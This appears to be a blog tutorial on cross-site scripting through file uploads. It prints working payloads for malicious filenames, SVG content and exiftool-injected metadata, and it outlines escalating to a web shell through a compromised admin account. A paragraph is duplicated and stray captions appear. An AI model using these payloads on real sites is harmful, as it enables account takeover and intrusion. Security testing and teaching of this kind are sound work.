xss payload
xss payload

Sometimes file upload functionality is vulnerable to XSS attack if there is a lack of sanitization. User restricted area with an uploaded image or profile picture is everywhere, providing more chances to find a developer’s mistake. By far in a web application, there are following entry points to perform an attack.

  1.  Filename

The filename itself may be being reflected in the page so it’s just a matter of binding that filename with XSS payloads. Sometimes if it doesn’t generate an XSS because filters like image size bypass developer have used. Below is the example of file upload XSS.

In above example, it’s just concern with classic payload, functionality without filters. So attacker can simply name payload as

“><img src=x onerror=prompt(document.domain)>.jpg

The disadvantage is that it only works with Linux based OS because Windows OS doesn’t allow you to name the file with above payload.

2. Content

If the application doesn’t allow the upload of AVG file extension (Image type) then bypass it with Burpsuite proxy and after that below content (Payload) can be used to trigger a Cross site scripting attack.

<svg xmlns=”http://www.xyz.com/svg”onload=”alert(document.domain)”/>

3.Metadata

Using the ExifTool it is possible to manipulate the metadata which may reflect somewhere on the server side. If you don’t have ExifTool just hit the following command in the terminal.

xss payload
                    XSS payload

sudo apt install libimage-exiftool-perl

An example is on the right side.

 

For more file types that can have its own signature as ASCII characters used for a payload. check here for more file types. There are more elaborate examples of XSS using an image file, Usually bypassing the server side size, name and GD library filters. Leveraging a cross site scripting vulnerabilities to RCE usually done by compromising the admin account of the targeted website. Admin used to have a upload functionalities via HTTP on their dashboard so it’s easy to make admin upload a web shell in the targeted website to achieve RCE by XSS.

Example: $exiftool -Directory='”><img src=1 onerror=alert(document.domain)>’ wal.jpg

For more file types that can have its own signature as ASCII characters used for a payload. check here for more file types. There are more elaborate examples of XSS using an image file, Usually bypassing the server side size, name and GD library filters. Leveraging a cross site scripting vulnerabilities to RCE usually done by compromising the admin account of the targeted website. Admin used to have a upload functionalities via HTTP on their dashboard so it’s easy to make admin upload a web shell in the targeted website to achieve RCE by cross site scripting.

LEAVE A REPLY

Please enter your comment!
Please enter your name here